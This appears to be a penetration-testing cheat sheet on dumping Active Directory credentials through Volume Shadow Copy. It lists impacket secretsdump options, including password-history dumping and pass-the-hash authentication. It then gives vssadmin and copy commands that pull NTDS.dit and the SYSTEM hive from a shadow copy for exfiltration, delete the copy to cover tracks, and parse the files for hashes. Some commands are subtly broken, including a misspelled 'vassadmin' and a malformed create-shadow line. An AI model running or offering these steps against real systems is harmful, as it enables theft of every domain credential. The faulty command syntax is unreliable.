Volume Shadow Copy
Volume Shadow Copy
Exploit
secretsdump.py [domain/username]<:password> <options> -use-vss
OPTIONS
-just-dc Extract Only NTDS.dit Data (NTLM/Kerberos Keys)
-just-dc-ntlm Extract Only NTDS.dit Data (NTLM Only)
-just-dc-user [username] Extract Only NTDS.dit Data For Specified User
-user-status Display If The User Is Disabled
-history Dump Password History
-outputfile Base Output Filename
-hashes Authenticate Using LMHASH:NTHASH
-k Use Kerberos Auth From ccache File## Create A Shadow Copy Of The C Drive
vssadmin create shadow for /for=C:
## Copy The NTDS.dit And SYSTEM Hive From The Shadow Copy To Be Exfiltrated
copy [ShadowCopyName]\Windows\NTDS\NTDS.dit C:\Windows\Temp\ntds.dit.save
copy [ShadowCopyName]\Windows\System32\Config\SYSTEM C:\Windows\Temp\system.save
## Delete The Shadow Copy We Created To Clean Up A Bit
vassadmin delete shadows /shadow=[ShadowCopyID]## Use impacket-secretsdump To Parse The Exfiltrated Files
impacket-secretsdump -ntds ntds.dit.save -system system.save LOCALLast updated